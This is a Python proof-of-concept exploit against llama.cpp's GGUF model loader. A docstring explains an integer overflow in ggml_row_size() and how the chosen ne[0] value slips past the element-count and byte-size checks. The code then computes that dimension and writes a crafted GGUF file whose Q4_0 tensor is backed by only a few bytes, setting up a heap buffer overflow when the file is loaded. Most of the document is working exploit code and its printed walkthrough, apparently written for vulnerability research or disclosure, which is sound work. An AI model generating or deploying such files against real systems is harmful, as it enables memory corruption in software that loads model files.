"""
PoC: Heap Buffer Overflow via Integer Overflow in Tensor Size Calculation
Target: llama.cpp GGUF loading (ggml/src/ggml.c and ggml/src/gguf.cpp)

=== Vulnerability Summary ===

In ggml_row_size() (ggml.c:1275):

    size_t ggml_row_size(enum ggml_type type, int64_t ne) {
        return ggml_type_size(type)*ne/ggml_blck_size(type);
    }

The multiplication `ggml_type_size(type) * ne` is performed in size_t (uint64_t)
arithmetic. When type_size * ne exceeds 2^64 - 1, the product silently wraps
around, producing a much smaller result than expected. The subsequent division
by blck_size then yields a tiny value.

This propagates to:
  - ggml_new_tensor_impl() (ggml.c:1686), where data_size is computed
  - ggml_nbytes() (ggml.c:1238), where the tensor byte size is computed
  - buffer allocation and data-loading code

The overflow check in gguf.cpp (lines 550-552) verifies that the ELEMENT COUNT
(ne[0]*ne[1]*ne[2]*ne[3]) fits in int64_t, but does NOT check that the BYTE SIZE
(element_count * type_size / blck_size) is computed without intermediate
overflow. For quantized types, the intermediate product can wrap even when the
element count fits comfortably in int64_t.

The check at gguf.cpp line 589:

    uint64_t(ggml_nelements(&info.t)/ggml_blck_size(info.t.type)) > SIZE_MAX/ggml_type_size(info.t.type)

uses ggml_nelements(), which computes ne[0]*ne[1]*ne[2]*ne[3] in int64_t. For
our chosen values this product fits in int64_t, so ggml_nelements returns the
correct value. Crucially, this check divides by blck_size BEFORE multiplying,
so it only proves that the FINAL byte size fits in size_t. ggml_row_size()
multiplies FIRST and divides afterwards, so its intermediate product can wrap
mod 2^64 even though the final byte size would fit — the check passes while
the computation overflows.

=== Exploit Strategy ===

For GGML_TYPE_Q4_0:
  - type_size = 18 bytes (sizeof(block_q4_0) = sizeof(ggml_half) + 32/2 = 2 + 16)
  - blck_size = 32

We choose ne[0] such that 18 * ne[0] wraps around 2^64 to a tiny value.

    ne[0] = 1024819115206086208  (divisible by 32)

Mathematically: 18 * ne[0] = 18446744073709551744 = 2^64 + 128
In uint64:      18 * ne[0] mod 2^64 = 128
After /32:      128 / 32 = 4 bytes (ggml_row_size returns 4!)

Correct:  18 * ne[0] / 32 = 576460752303423492 bytes (~512 PB)
Computed: 4 bytes

Ratio: the buffer is 144,115,188,075,855,873x too small!

Validation bypass:
  - ne[0] = 1024819115206086208 < INT64_MAX (9223372036854775807) -> passes
  - ne[0] > 0                                  -> passes non-negative check
  - ne[0] % 32 == 0                            -> passes block-alignment check
  - ggml_nelements = ne[0] = 1024819115206086208
  - nelements/32 = 32025597350190194
  - SIZE_MAX/18  = 1024819115206086200
  - 32025597350190194 < 1024819115206086200    -> passes byte-size check (line 589)!

Result: a tensor is created with ne[0] = 1024819115206086208 elements but backed
by only 4-32 bytes of actual buffer. Any operation that accesses data beyond the
first few bytes triggers a heap buffer overflow.

=== GGUF Binary Format Reference ===

Header:
  - magic: "GGUF" (4 bytes)
  - version: uint32 (3)
  - n_tensors: uint64
  - n_kv: uint64

KV pairs:
  - key: string (uint64 len + chars)
  - type: uint32 (GGUF type enum)
  - value: type-dependent

Tensor info (per tensor):
  - name: string (uint64 len + chars)
  - n_dims: uint32
  - ne[0..n_dims-1]: int64 each
  - type: uint32 (ggml_type enum)
  - offset: uint64

Data section: aligned to ctx->alignment (default 32)
"""
|
|
import struct
import sys
import os
import math


# ---------------------------------------------------------------------------
# GGUF container constants
# ---------------------------------------------------------------------------

GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3

# gguf_type enum: value types for metadata KV pairs.
GGUF_TYPE_UINT8 = 0
GGUF_TYPE_INT8 = 1
GGUF_TYPE_UINT16 = 2
GGUF_TYPE_INT16 = 3
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_INT32 = 5
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_BOOL = 7
GGUF_TYPE_STRING = 8
GGUF_TYPE_ARRAY = 9
GGUF_TYPE_UINT64 = 10
GGUF_TYPE_INT64 = 11
GGUF_TYPE_FLOAT64 = 12

# ggml_type enum: tensor element types (the subset referenced by this PoC).
GGML_TYPE_F32 = 0
GGML_TYPE_F16 = 1
GGML_TYPE_Q4_0 = 2
GGML_TYPE_Q4_1 = 3
GGML_TYPE_Q5_0 = 6
GGML_TYPE_Q5_1 = 7
GGML_TYPE_Q8_0 = 8
GGML_TYPE_I8 = 24
GGML_TYPE_I32 = 26

# Q4_0 block layout: an 18-byte block (2-byte fp16 scale + 16 packed nibbles)
# covering 32 elements — type_size > blck_size/2 is what makes the byte-size
# product overflow while the element count still fits in int64_t.
Q4_0_TYPE_SIZE = 18
Q4_0_BLCK_SIZE = 32

# C integer limits mirrored as exact Python ints.
INT64_MAX = (1 << 63) - 1
UINT64_MAX = (1 << 64) - 1
SIZE_MAX = UINT64_MAX  # assumes a 64-bit size_t target

# Default alignment of the GGUF data section (ctx->alignment).
GGML_DEFAULT_ALIGNMENT = 32
|
|
| |
| |
| |
|
|
def write_string(f, s):
    """Write a GGUF string to *f*: uint64 little-endian byte length, then the raw UTF-8 bytes (no NUL terminator)."""
    payload = s.encode('utf-8')
    header = struct.pack('<Q', len(payload))
    f.write(header)
    f.write(payload)
|
|
def write_kv_string(f, key, value):
    """Emit one metadata KV pair whose payload is a GGUF string: key, type tag, value."""
    write_string(f, key)
    type_tag = struct.pack('<I', GGUF_TYPE_STRING)
    f.write(type_tag)
    write_string(f, value)
|
|
def write_kv_uint32(f, key, value):
    """Emit one metadata KV pair holding a uint32: key, then type tag and value packed together."""
    write_string(f, key)
    f.write(struct.pack('<II', GGUF_TYPE_UINT32, value))
|
|
def write_kv_float32(f, key, value):
    """Emit one metadata KV pair holding a float32: key, then type tag and value packed together."""
    write_string(f, key)
    f.write(struct.pack('<If', GGUF_TYPE_FLOAT32, value))
|
|
def write_kv_string_array(f, key, values):
    """Emit one metadata KV pair holding an array of strings: key, array tag, element type, count, then each string."""
    write_string(f, key)
    # ARRAY tag + element type + uint64 count, packed as one contiguous header.
    f.write(struct.pack('<IIQ', GGUF_TYPE_ARRAY, GGUF_TYPE_STRING, len(values)))
    for item in values:
        write_string(f, item)
|
|
def write_kv_float32_array(f, key, values):
    """Emit one metadata KV pair holding an array of float32: key, array tag, element type, count, then the values."""
    write_string(f, key)
    count = len(values)
    # ARRAY tag + element type + uint64 count, packed as one contiguous header.
    f.write(struct.pack('<IIQ', GGUF_TYPE_ARRAY, GGUF_TYPE_FLOAT32, count))
    # Bulk-pack all floats; '<Nf' is byte-identical to N separate '<f' packs.
    f.write(struct.pack(f'<{count}f', *values))
|
|
def write_tensor_info(f, name, n_dims, ne_list, ggml_type, offset):
    """Emit one tensor-info record: name, n_dims, the first n_dims entries of ne_list as int64, type, offset."""
    write_string(f, name)
    f.write(struct.pack('<I', n_dims))
    # Bulk-pack the dimensions; '<Nq' is byte-identical to N separate '<q' packs.
    f.write(struct.pack(f'<{n_dims}q', *ne_list[:n_dims]))
    f.write(struct.pack('<IQ', ggml_type, offset))
|
|
|
|
| |
| |
| |
|
|
def compute_overflow_ne0(type_size=18, blck_size=32, target_remainder=128):
    """
    Compute a tensor dimension ne[0] whose byte-size product wraps uint64.

    Solves  type_size * ne0 == 2**64 + target_remainder  exactly, so that in
    64-bit unsigned arithmetic the product wraps to `target_remainder` and
    ggml_row_size() collapses to target_remainder // blck_size bytes.

    The defaults mirror GGML_TYPE_Q4_0 (Q4_0_TYPE_SIZE=18, Q4_0_BLCK_SIZE=32)
    with remainder 128, giving an overflowed row size of 128/32 = 4 bytes.
    The parameters are exposed so other quantized layouts can be probed.

    Args:
        type_size: bytes per quantization block (ggml_type_size).
        blck_size: elements per quantization block (ggml_blck_size).
        target_remainder: desired value of (type_size * ne0) mod 2**64;
            should be divisible by blck_size for a clean tiny row size.

    Returns:
        ne0 satisfying:
          - 0 < ne0 < 2**63            (fits in int64_t -> passes count checks)
          - ne0 % blck_size == 0       (passes block-alignment check)
          - (type_size * ne0) % 2**64 == target_remainder  (the overflow)

    Raises:
        ValueError: if 2**64 + target_remainder is not an exact multiple of
            type_size (no integral solution for these parameters).
        AssertionError: if the solution violates the alignment or int64 bounds.
    """
    target_product = (1 << 64) + target_remainder

    # An exact solution requires the target product to be a multiple of type_size.
    if target_product % type_size != 0:
        raise ValueError(f"Cannot find exact ne[0]: {target_product} not divisible by {type_size}")

    ne0 = target_product // type_size
    assert ne0 * type_size == target_product, "Arithmetic check failed"

    # Must be a whole number of quant blocks or the loader rejects the tensor.
    assert ne0 % blck_size == 0, f"ne[0]={ne0} not divisible by blck_size={blck_size}"

    # Must be a positive int64_t to pass the element-count validation.
    assert 0 < ne0 < (1 << 63), f"ne[0]={ne0} does not fit in int64_t"

    return ne0
|
|
|
|
def verify_overflow(ne0: int, ne1: int = 1, ne2: int = 1, ne3: int = 1) -> tuple:
    """Verify that the chosen dimensions bypass all checks and cause overflow.

    Mirrors, in exact Python integer arithmetic, the validation checks in
    gguf.cpp and the size computations in ggml.c (ggml_row_size /
    ggml_new_tensor_impl / ggml_nbytes), modelling uint64 wraparound with
    `% (1 << 64)`. Asserts that every loader-side check passes for the given
    shape, prints a step-by-step analysis, and returns the sizes the C code
    would compute.

    Returns:
        (data_size, nbytes, padded): the overflowed data size, the overflowed
        ggml_nbytes value, and the alignment-padded allocation size.
    """
    type_size = Q4_0_TYPE_SIZE
    blck_size = Q4_0_BLCK_SIZE

    print(f"\n{'='*70}")
    print("OVERFLOW ANALYSIS")
    print(f"{'='*70}")
    print(f"Type: Q4_0 (type_size={type_size}, blck_size={blck_size})")
    print(f"Dimensions: ne[0]={ne0}, ne[1]={ne1}, ne[2]={ne2}, ne[3]={ne3}")
    print()

    # The loader rejects negative dimensions outright.
    assert ne0 >= 0 and ne1 >= 0 and ne2 >= 0 and ne3 >= 0
    print("[PASS] All ne[j] >= 0 (non-negative check)")

    # Element-count overflow checks (gguf.cpp:550-552): the running product
    # ne[0]*...*ne[j] must stay below INT64_MAX at each step. Each `checkN`
    # mirrors the C condition `INT64_MAX/ne[j+1] <= product` and must be False
    # for the file to be accepted.
    check1 = INT64_MAX // ne1 <= ne0
    print(f" Check 1: INT64_MAX/ne[1] = {INT64_MAX // ne1} <= ne[0] = {ne0} ? {check1}")
    assert not check1, "Failed overflow check 1!"

    prod01 = ne0 * ne1
    assert prod01 < (1 << 63), f"ne[0]*ne[1] = {prod01} overflows int64_t!"
    check2 = INT64_MAX // ne2 <= prod01
    print(f" Check 2: INT64_MAX/ne[2] = {INT64_MAX // ne2} <= ne[0]*ne[1] = {prod01} ? {check2}")
    assert not check2, "Failed overflow check 2!"

    prod012 = prod01 * ne2
    assert prod012 < (1 << 63), f"ne[0]*ne[1]*ne[2] = {prod012} overflows int64_t!"
    check3 = INT64_MAX // ne3 <= prod012
    print(f" Check 3: INT64_MAX/ne[3] = {INT64_MAX // ne3} <= ne[0]*ne[1]*ne[2] = {prod012} ? {check3}")
    assert not check3, "Failed overflow check 3!"

    print("[PASS] Overflow check at gguf.cpp:550-552 bypassed")

    # Quantized tensors must contain a whole number of blocks.
    assert ne0 % blck_size == 0
    print(f"[PASS] ne[0] % blck_size == 0 (block alignment check)")

    # Byte-size check (gguf.cpp:589): nelements/blck_size > SIZE_MAX/type_size
    # must be False. It divides before comparing, so it only proves the FINAL
    # byte size fits — not that the multiply-first row-size product does.
    nelements = ne0 * ne1 * ne2 * ne3
    assert nelements < (1 << 63), "ggml_nelements overflows int64_t!"
    lhs = nelements // blck_size
    rhs = SIZE_MAX // type_size
    byte_check = lhs > rhs
    print(f" Byte size check: nelements/blck_size = {lhs} > SIZE_MAX/type_size = {rhs} ? {byte_check}")
    assert not byte_check, "Failed byte size check!"
    print("[PASS] Byte size check at gguf.cpp:589 bypassed")

    print(f"\n{'='*70}")
    print("SIZE COMPUTATION (showing the overflow)")
    print(f"{'='*70}")

    # ggml_row_size(): type_size*ne[0] is computed in uint64 BEFORE dividing
    # by blck_size, so the intermediate product wraps mod 2^64.
    true_product = type_size * ne0
    wrapped_product = true_product % (1 << 64)
    row_size_overflowed = wrapped_product // blck_size
    row_size_correct = true_product // blck_size

    print(f"\nggml_row_size computation:")
    print(f" type_size * ne[0] = {true_product}")
    print(f" = 2^64 * {true_product // (1 << 64)} + {true_product % (1 << 64)}")
    print(f" In uint64_t (mod 2^64): {wrapped_product}")
    print(f" After / blck_size: {row_size_overflowed} bytes <-- OVERFLOWED!")
    print(f" Correct value: {row_size_correct} bytes")
    print(f" Overflow factor: {row_size_correct / row_size_overflowed:.0f}x too small!")

    # ggml_new_tensor_impl(): data_size = row_size * ne[1] * ne[2] * ne[3],
    # again in wrapping uint64 arithmetic.
    data_size = row_size_overflowed
    for dim in [ne1, ne2, ne3]:
        if dim > 1:
            data_size = (data_size * dim) % (1 << 64)

    correct_size = row_size_correct * ne1 * ne2 * ne3

    print(f"\ndata_size (ggml_new_tensor_impl):")
    print(f" Computed: {data_size} bytes ({data_size} B)")
    print(f" Correct: {correct_size} bytes ({correct_size / (1024**5):.1f} PB)")

    # Strides as ggml sets them for a quantized tensor: nb[0] = block byte
    # size, nb[1] = bytes per row, nb[2]/nb[3] = higher-dimension strides.
    nb0 = type_size
    nb1 = type_size * (ne0 // blck_size)
    nb2 = nb1 * ne1
    nb3 = nb2 * ne2

    # ggml_nbytes(): ne[0]*nb[0] also wraps in uint64 before / blck_size.
    ne0_nb0_true = ne0 * nb0
    ne0_nb0_wrapped = ne0_nb0_true % (1 << 64)
    nbytes_first = ne0_nb0_wrapped // blck_size

    # Remaining ggml_nbytes terms: (ne[i]-1)*nb[i] for the higher dimensions.
    nbytes = nbytes_first
    if ne1 > 1:
        nbytes += (ne1 - 1) * nb1
    if ne2 > 1:
        nbytes += (ne2 - 1) * nb2
    if ne3 > 1:
        nbytes += (ne3 - 1) * nb3

    nbytes_correct = correct_size

    print(f"\nggml_nbytes:")
    print(f" ne[0]*nb[0] = {ne0} * {nb0} = {ne0_nb0_true}")
    print(f" In uint64_t: {ne0_nb0_wrapped}")
    print(f" / blck_size: {nbytes_first}")
    print(f" + stride terms: {nbytes - nbytes_first}")
    print(f" Total nbytes: {nbytes} bytes")
    print(f" Correct value: {nbytes_correct} bytes")

    # The allocation rounds the (overflowed) nbytes up to the data alignment,
    # i.e. GGML_PAD(nbytes, GGML_DEFAULT_ALIGNMENT).
    padded = ((nbytes + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
    print(f"\n{'='*70}")
    print("HEAP BUFFER OVERFLOW")
    print(f"{'='*70}")
    print(f" Buffer allocated: {padded} bytes (GGML_PAD({nbytes}, {GGML_DEFAULT_ALIGNMENT}))")
    print(f" Tensor logical size: {nbytes_correct} bytes")
    print(f" Overflow: {nbytes_correct - padded} bytes beyond allocation")
    print(f" Stride nb[1]: {nb1} bytes (distance between rows)")
    print(f" Any access to row 1+ is {nb1 - padded} bytes out of bounds!")

    return data_size, nbytes, padded
|
|
|
|
def create_poc_gguf(output_path):
    """
    Create a GGUF file with a tensor whose dimensions cause integer overflow
    in ggml_row_size(), resulting in a tiny buffer allocation for what should
    be an enormous tensor.

    Layout written: GGUF v3 header, 16 KV pairs of minimal llama-architecture
    metadata (including a 4-token vocabulary), one tensor-info record for a
    1-D Q4_0 tensor at offset 0, alignment padding, then only `padded_size`
    bytes of filler tensor data (the overflowed size the loader will expect).

    Args:
        output_path: path of the GGUF file to write.

    Returns:
        output_path on success.
    """
    # Overflow-inducing shape: a 1-D tensor with the crafted ne[0].
    ne0 = compute_overflow_ne0()
    ne1 = 1
    ne2 = 1
    ne3 = 1

    # Re-check the validation bypass and obtain the (overflowed) sizes.
    data_size, nbytes, padded_size = verify_overflow(ne0, ne1, ne2, ne3)

    tensor_name = "token_embd.weight"
    n_tensors = 1

    print(f"\n{'='*70}")
    print("GENERATING GGUF FILE")
    print(f"{'='*70}")
    print(f" Tensor: '{tensor_name}'")
    print(f" Type: Q4_0 (type_size=18, blck_size=32)")
    print(f" Dimensions: ne[0]={ne0}")
    print(f" Tensor data in file: {padded_size} bytes (the overflowed/small size)")
    print(f" Output: {output_path}")

    with open(output_path, 'wb') as f:
        # --- header: magic, version, tensor count ---
        f.write(GGUF_MAGIC)
        f.write(struct.pack('<I', GGUF_VERSION))
        f.write(struct.pack('<Q', n_tensors))

        # Minimal vocabulary so the tokenizer metadata is well-formed.
        vocab_tokens = ["<unk>", "<s>", "</s>", "hello"]
        vocab_scores = [0.0, 0.0, 0.0, -1.0]
        vocab_types = [0, 3, 3, 1]

        # 13 scalar/string KVs + 3 arrays written below = 16 pairs total.
        n_kv = 16
        f.write(struct.pack('<Q', n_kv))

        # --- KV pairs: minimal llama architecture metadata ---
        write_kv_string(f, "general.architecture", "llama")
        write_kv_string(f, "general.name", "overflow-poc")
        write_kv_uint32(f, "llama.context_length", 2048)
        write_kv_uint32(f, "llama.embedding_length", 4096)
        write_kv_uint32(f, "llama.block_count", 1)
        write_kv_uint32(f, "llama.feed_forward_length", 11008)
        write_kv_uint32(f, "llama.attention.head_count", 32)
        write_kv_uint32(f, "llama.attention.head_count_kv", 32)
        write_kv_float32(f, "llama.rope.freq_base", 10000.0)
        write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5)
        write_kv_string(f, "tokenizer.ggml.model", "llama")
        write_kv_uint32(f, "tokenizer.ggml.bos_token_id", 1)
        write_kv_uint32(f, "tokenizer.ggml.eos_token_id", 2)

        # --- tokenizer arrays ---
        write_kv_string_array(f, "tokenizer.ggml.tokens", vocab_tokens)
        write_kv_float32_array(f, "tokenizer.ggml.scores", vocab_scores)

        # token_type is an int32 array; written inline (no helper for int32).
        write_string(f, "tokenizer.ggml.token_type")
        f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
        f.write(struct.pack('<I', GGUF_TYPE_INT32))
        f.write(struct.pack('<Q', len(vocab_types)))
        for t in vocab_types:
            f.write(struct.pack('<i', t))

        # --- tensor info: the malicious 1-D Q4_0 tensor at data offset 0 ---
        write_tensor_info(f, tensor_name, 1, [ne0], GGML_TYPE_Q4_0, 0)

        # --- pad up to the data-section alignment boundary ---
        current_pos = f.tell()
        aligned_pos = ((current_pos + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
        padding_needed = aligned_pos - current_pos
        if padding_needed > 0:
            f.write(b'\x00' * padding_needed)

        # --- tensor data: only the tiny overflowed size, matching what the
        # vulnerable loader will compute and expect to find in the file ---
        tensor_data = b'\xAA' * padded_size
        f.write(tensor_data)

    file_size = os.path.getsize(output_path)
    print(f" File size: {file_size} bytes")
    print(f"\n[+] GGUF file written successfully")

    return output_path
|
|
|
|
def main():
    """Generate the PoC GGUF file and print the exploitation walkthrough."""
    # Output location: cwd-relative "gguf_poc" by default, overridable via
    # GGUF_POC_DIR (previously a hardcoded absolute user path, which made the
    # script non-portable).
    output_dir = os.environ.get("GGUF_POC_DIR", os.path.join(os.getcwd(), "gguf_poc"))
    os.makedirs(output_dir, exist_ok=True)

    output_path = os.path.join(output_dir, "poc_tensor_overflow.gguf")

    print("=" * 70)
    print("PoC: Integer Overflow in Tensor Size Calculation (GGUF)")
    print("Target: llama.cpp ggml_row_size() / ggml_nbytes()")
    print("=" * 70)

    # Show the crafted dimension and the properties that let it pass validation.
    ne0 = compute_overflow_ne0()
    print(f"\n[+] Found overflow-inducing ne[0] = {ne0}")
    print(f" = 0x{ne0:016X}")
    print(f" Fits in int64_t: {ne0 < (1 << 63)}")
    print(f" Divisible by 32: {ne0 % 32 == 0}")

    print(f"\n[+] Verifying validation bypass and computing overflow...")

    create_poc_gguf(output_path)

    print(f"\n{'='*70}")
    print("EXPLOITATION")
    print(f"{'='*70}")
    print(f"""
When llama.cpp loads this GGUF file:

1. gguf_init_from_file() reads tensor info:
- ne[0] = {ne0}
- type = Q4_0 (type_size=18, blck_size=32)
- All validation checks PASS (see analysis above)

2. ggml_nbytes() computes tensor size:
- ne[0] * nb[0] = {ne0} * 18 = {ne0 * 18}
- In uint64_t: {(ne0 * 18) % (1 << 64)} (OVERFLOWED!)
- Result: {((ne0 * 18) % (1 << 64)) // 32} bytes instead of {ne0 * 18 // 32}

3. Buffer allocation uses the tiny overflowed size
-> Only {(((ne0 * 18) % (1 << 64)) // 32 + 31) // 32 * 32} bytes allocated

4. Tensor metadata says ne[0]={ne0} with stride nb[1]={18 * (ne0 // 32)}
-> Any access beyond first few bytes is a HEAP BUFFER OVERFLOW

To test with llama-cli (demonstrates GGUF validation bypass):
./llama-cli -m {output_path} -p 'hello' 2>&1
# Note: llama-cli rejects at model-level shape check, but GGUF parsing passes

To test with the C test harness (demonstrates the actual overflow):
./test_tensor_overflow {output_path}
# Shows: ggml_nbytes=4 for tensor with 10^18 elements -> HEAP BUFFER OVERFLOW
""")


if __name__ == "__main__":
    main()
|
|